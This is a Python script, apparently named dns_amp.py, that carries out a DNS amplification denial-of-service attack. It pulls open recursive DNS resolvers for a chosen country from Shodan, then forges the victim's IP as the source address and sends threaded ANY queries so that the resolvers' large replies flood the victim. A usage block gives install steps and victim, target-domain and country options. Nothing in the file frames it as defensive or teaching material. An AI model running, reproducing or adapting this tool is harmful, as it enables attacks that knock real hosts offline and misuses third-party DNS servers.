import os import click import threading from scapy.layers.dns import DNS, DNSQR from scapy.layers.inet import IP, UDP, ICMP from scapy.sendrecv import sr1 """ # Install the following packages pip install scapy pip install click pip install shodan # Usage shodan init python dns_amp.py --victim --targeted --country """ class DNSAttack: def __init__(self, victim: str, target: str, country: str = 'US', qtype: str = 'ANY'): self.country: str = country self.victim: str = victim self.target: str = target self.qtype: str = qtype def flood_dns_amplification(self) -> None: with open('ip_addresses.txt') as f: contents = f.readlines() for ip in contents: dns_pkt = IP(src=self.victim, dst=ip.strip()) / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname=self.target, qtype=self.qtype)) dns_answer = sr1(dns_pkt, timeout=0, verbose=0) if dns_answer is None or dns_answer.haslayer(ICMP): quit() def get_recursive_dns_servers(self) -> None: shodan_query = f'shodan download --fields ip_str recursion "shodan.module:dns-udp recursion enabled country:{self.country}" --limit -1 > /dev/null 2>&1' os.system(shodan_query) parse_ip = "jq -r '.ip_str' recursion.json.gz > ip_addresses.txt" os.system(parse_ip) def start_attack(self, thread_count: int = 10) -> None: threads: list = [] for _ in range(thread_count): thread = threading.Thread(target=self.flood_dns_amplification) thread.start() threads.append(thread) for thread in threads: thread.join() @click.command() @click.option('--victim', '-v', help='Victim IP address') @click.option('--targeted', '-t', help='Targeted domain') @click.option('--country', '-c', help='Country code') @click.option('--thread_count', '-tc', help='Thread count') @click.option('--qtype', '-qt', help='Query type') def main(victim: str, targeted: str, country: str, thread_count: int, qtype: str): dns_attack = DNSAttack(victim, targeted, country, qtype) dns_attack.get_recursive_dns_servers() dns_attack.start_attack(thread_count=thread_count) if __name__ == '__main__': main()